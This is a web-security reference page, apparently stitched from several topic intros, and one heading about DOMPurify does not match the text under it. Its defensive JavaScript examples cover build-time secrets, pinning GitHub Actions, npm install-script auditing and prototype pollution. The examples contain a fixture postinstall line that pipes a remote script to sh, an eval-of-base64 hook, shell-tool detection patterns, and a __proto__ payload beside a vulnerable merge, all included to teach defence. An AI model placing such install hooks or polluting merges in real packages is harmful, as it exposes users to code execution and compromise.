Advanced Publishing Topics
This page covers patterns used by mature libraries and OSS projects for reliable, modern package publishing.
What is DOMPurify
This page covers how environment variables work in frontend and Node.js projects — naming conventions, the critical distinction between build-time and runtime variables, and how to manage secrets safely in local development, CI/CD, and production. This is the deeper coverage referenced from Web Security Essentials.
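The build-time versus runtime distinction is easiest to see in code. The following is an added example, not code from the original page: a minimal model of what a bundler does when it inlines process.env references, beside a runtime accessor that reads the value only when it is needed. The module source, the values, and the PUBLIC_ prefix are all constructed for the example; the prefix stands in for whatever convention your bundler actually uses.

```javascript
// Added example (not from the original page): a build-time inlined variable
// versus one read at runtime. Source text, values and the PUBLIC_ prefix are
// constructed assumptions for illustration.

const frontendSource = [
  'const apiUrl = process.env.PUBLIC_API_URL;',
  'const key = process.env.PAYMENT_API_SECRET;',
  'fetch(apiUrl, { headers: { Authorization: key } });',
].join('\n');

// Build-time: a bundler replaces each process.env.NAME with the literal value
// present in the build environment. Anything referenced ships in the bundle,
// secret or not, and cannot be changed afterwards without rebuilding.
function inlineEnv(source, buildEnv) {
  const inlined = [];
  const bundle = source.replace(/process\.env\.([A-Za-z_][A-Za-z0-9_]*)/g, (_, name) => {
    if (!(name in buildEnv)) return 'undefined';
    inlined.push(name);
    return JSON.stringify(buildEnv[name]);
  });
  return { bundle, inlined };
}

// Names that would be baked into the bundle but are not marked as public.
// Anything returned here is a secret about to be shipped to every browser.
function nonPublicInlined(source, buildEnv, publicPrefix = 'PUBLIC_') {
  return inlineEnv(source, buildEnv).inlined.filter((n) => !n.startsWith(publicPrefix));
}

// Runtime: a server-side accessor reads the value when it is asked for, so a
// rotated secret or a changed environment takes effect without a rebuild,
// and a missing variable fails loudly instead of becoming "undefined".
function makeRuntimeConfig(env) {
  return {
    get(name) {
      const value = env[name];
      if (value === undefined) throw new Error(`missing env var ${name}`);
      return value;
    },
  };
}
```

Run nonPublicInlined over the modules that feed your frontend build and treat any non-empty result as a build failure; the runtime accessor pattern is what belongs on the server side, where the secret stays out of the bundle entirely.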
GitHub Actions workflows fetch third-party actions from GitHub repositories. Every action named in a uses: line is a dependency, and like an npm package it can be compromised or typosquatted; because version tags are mutable, the tag you referenced can also be moved to different code after you first adopted it. This page covers the risks and how to address them.
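The check a practitioner wants for this is whether every uses: reference is pinned to an immutable commit SHA rather than a movable tag or branch. The following is an added example, not code from the original page or from any GitHub tooling: a small auditor that pulls the uses: references out of a workflow file and reports the ones that are not pinned. The workflow text is constructed, and the 40-character SHA in it is a placeholder, not a real commit.

```javascript
// Added example (not from the original page): flag GitHub Actions `uses:`
// references that are not pinned to a full commit SHA. The workflow below is
// constructed; the SHA is a placeholder, not a real commit.

const sampleWorkflow = `
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@1e60f620b9541d16bece96c5465dc8ee9832be0b # v4.0.2
      - uses: ./.github/actions/local-thing
      - uses: docker://alpine:3.19
      - uses: some-org/some-action@main
`;

// A full commit SHA is the only reference GitHub cannot silently move.
const FULL_SHA = /^[0-9a-f]{40}$/;

// Returns one record per `uses:` line: { ref, pinned, reason }.
function auditUses(workflowText) {
  const results = [];
  for (const line of workflowText.split('\n')) {
    const m = line.match(/^\s*-?\s*uses:\s*["']?([^"'\s#]+)/);
    if (!m) continue;
    const ref = m[1];

    // Local actions live in the same repo: no external dependency to pin.
    if (ref.startsWith('./')) {
      results.push({ ref, pinned: true, reason: 'local action' });
      continue;
    }
    // Container actions are pinned only when an image digest is given.
    if (ref.startsWith('docker://')) {
      const pinned = ref.includes('@sha256:');
      results.push({ ref, pinned, reason: pinned ? 'image digest' : 'mutable image tag' });
      continue;
    }
    const at = ref.lastIndexOf('@');
    if (at === -1) {
      results.push({ ref, pinned: false, reason: 'no version reference at all' });
      continue;
    }
    const version = ref.slice(at + 1);
    const pinned = FULL_SHA.test(version);
    results.push({ ref, pinned, reason: pinned ? 'full commit SHA' : `mutable ref "${version}"` });
  }
  return results;
}

// Just the references that need attention.
function unpinned(workflowText) {
  return auditUses(workflowText).filter((r) => !r.pinned).map((r) => r.ref);
}
```

The trailing comment after a SHA (the "# v4.0.2" in the sample) is the usual way to keep the pin readable; the regex stops at the comment so it does not affect the check. Pinning alone does not tell you the pinned commit is benign, so review the action source at that commit when you first adopt it.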
The HTML Sanitizer API sanitizes untrusted HTML before DOM insertion, removing XSS-dangerous content (scripts, event handlers) using the browser's own parser — eliminating parser-differential vulnerabilities that plague userland sanitizers.
This page is a practical distillation of the OWASP NPM Security Cheat Sheet, organized by workflow phase. For the why — attack vectors, incident history, and defense rationale — read npm Supply Chain Attacks first; this page is the what to do reference, with particular emphasis on publisher-side hygiene.
A supply chain attack in the npm ecosystem occurs when an attacker compromises a package — or the infrastructure around it — to inject malicious code into applications that depend on it. npm is uniquely exposed to this class of attack: the registry hosts over 3 million packages, the average project pulls in hundreds of transitive dependencies, many packages are maintained by a single person, and npm install executes arbitrary install scripts by default. This page covers what has happened, how these attacks work, and what you can do to defend against them.
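Because npm install runs install scripts by default, one concrete defensive check is to know which of your dependencies declare them and what those scripts do. The following is an added example, not code from the original page or from npm itself: an auditor over package manifests that lists the install-phase hooks and flags commands with traits that legitimate build steps rarely need. The manifests, package names and scripts are all constructed, and the heuristics are a starting point, not a detector of every malicious script.

```javascript
// Added example (not from the original page): audit package manifests for
// lifecycle scripts that npm runs automatically during install. All names,
// versions and scripts below are constructed for the example.

const sampleManifests = [
  { name: 'native-thing', version: '2.1.0',
    scripts: { install: 'node-gyp rebuild', test: 'mocha' } },
  { name: 'left-shim', version: '0.0.3',
    scripts: { postinstall: 'curl -s https://example.invalid/x.sh | sh' } },
  { name: 'plain-lib', version: '1.4.2', scripts: { build: 'tsc' } },
  { name: 'obf-helper', version: '9.9.9',
    scripts: { preinstall: 'node -e "eval(Buffer.from(\'Y29uc29sZS5sb2coMSk=\', \'base64\').toString())"' } },
];

// Hooks npm runs for a dependency fetched from the registry during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Traits that a legitimate install script (typically a native build) rarely has.
const RED_FLAGS = [
  [/\bcurl\b|\bwget\b/, 'downloads from the network'],
  [/\|\s*(sh|bash)\b/, 'pipes to a shell'],
  [/node\s+-e\b/, 'runs inline JavaScript'],
  [/\beval\b|base64/, 'eval or base64-decoded payload'],
];

// Returns { name, version, hooks, flags } for one manifest.
function auditManifest(manifest) {
  const hooks = {};
  for (const hook of INSTALL_HOOKS) {
    if (manifest.scripts && typeof manifest.scripts[hook] === 'string') {
      hooks[hook] = manifest.scripts[hook];
    }
  }
  const flags = [];
  for (const [hook, cmd] of Object.entries(hooks)) {
    for (const [re, why] of RED_FLAGS) {
      if (re.test(cmd)) flags.push(`${hook}: ${why}`);
    }
  }
  return { name: manifest.name, version: manifest.version, hooks, flags };
}

// Every package that will execute something on install, flagged or not.
function packagesWithInstallHooks(manifests) {
  return manifests.map(auditManifest).filter((r) => Object.keys(r.hooks).length > 0);
}

// Only the packages whose install hooks tripped a red flag.
function flaggedPackages(manifests) {
  return packagesWithInstallHooks(manifests).filter((r) => r.flags.length > 0).map((r) => r.name);
}
```

In practice you would feed this the package.json of each directory under node_modules. The blunt mitigation is to disable install scripts altogether with npm install --ignore-scripts (or ignore-scripts=true in .npmrc) and then rebuild the few native packages that genuinely need a build step; the audit above tells you which ones those are.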
Prototype pollution is a JavaScript-specific vulnerability class where an attacker injects properties into Object.prototype, affecting every object in the application. It is less well-known than XSS or CSRF, but has led to serious real-world exploits — including remote code execution in Node.js.
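The mechanism is clearest in a recursive merge, the code shape in which most real prototype-pollution bugs have been found. The following is an added example, not code from the original page or from any particular library: a merge that pollutes Object.prototype from a JSON payload, beside a hardened version of the same function. The payload is constructed to look like an attacker-controlled request body.

```javascript
// Added example (not from the original page): a recursive merge in its
// polluting form and its hardened form. The payload is constructed.

// JSON.parse creates "__proto__" as an ordinary own property, so it survives
// into Object.keys() of the parsed object.
const payload = JSON.parse('{"profile":{"name":"eve"},"__proto__":{"isAdmin":true}}');

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Vulnerable: target["__proto__"] resolves to Object.prototype, which passes
// the plain-object check, so the recursion writes isAdmin into it.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (isPlainObject(source[key])) {
      if (!isPlainObject(target[key])) target[key] = {};
      unsafeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Keys through which a write can reach a prototype.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Hardened: drop the dangerous keys, and only recurse into a nested object
// the target actually owns, never one it inherits.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    if (isPlainObject(source[key])) {
      const ownNested = Object.prototype.hasOwnProperty.call(target, key) && isPlainObject(target[key]);
      if (!ownNested) target[key] = {};
      safeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Merge the payload, then ask an unrelated fresh object whether it is admin.
// Cleans up afterwards so the rest of the process is not left polluted.
function demoUnsafe() {
  unsafeMerge({}, payload);
  const polluted = ({}).isAdmin === true;
  delete Object.prototype.isAdmin;
  return polluted;
}

function demoSafe() {
  const user = safeMerge({}, payload);
  return {
    polluted: ({}).isAdmin === true,
    name: user.profile.name,
    ownProto: Object.prototype.hasOwnProperty.call(user, '__proto__'),
  };
}
```

The key filter is the fix most libraries shipped; the own-property check closes the second path, where a target that already inherits a nested object would otherwise be recursed into. Freezing Object.prototype at startup, or running Node with --disable-proto=delete, is a defence-in-depth layer that makes the whole class fail closed even if a merge somewhere is missed.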
Security is a first-class concern, not an afterthought. This page is a condensed reference of the most common web security topics — each section gives the core idea, what to do about it, and where to go deeper. For topic-specific deep dives, see the dedicated pages linked throughout this section.